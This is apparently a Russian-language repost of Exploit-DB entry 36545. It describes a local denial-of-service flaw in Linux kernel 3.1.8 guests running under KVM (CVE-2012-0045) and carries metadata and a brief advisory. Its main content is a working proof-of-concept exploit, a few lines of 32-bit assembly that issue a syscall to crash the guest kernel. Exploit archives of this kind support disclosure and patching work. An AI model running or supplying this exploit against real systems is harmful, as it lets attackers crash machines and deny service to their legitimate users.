- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 36545
- Проверка EDB
-
- Пройдено
- Автор
- STEPHAN SATTLER
- Тип уязвимости
- DOS
- Платформа
- LINUX
- CVE
- cve-2012-0045
- Дата публикации
- 2011-12-29
Linux Kernel 3.1.8 - KVM Local Denial of Service
Код:
source: https://www.securityfocus.com/bid/51389/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause the kernel to crash, denying service to legitimate users.
NOTE: This issue affects Linux kernels running as guest images.
[bits 32]
global _start
SECTION .text
_start: syscall
- Источник
- www.exploit-db.com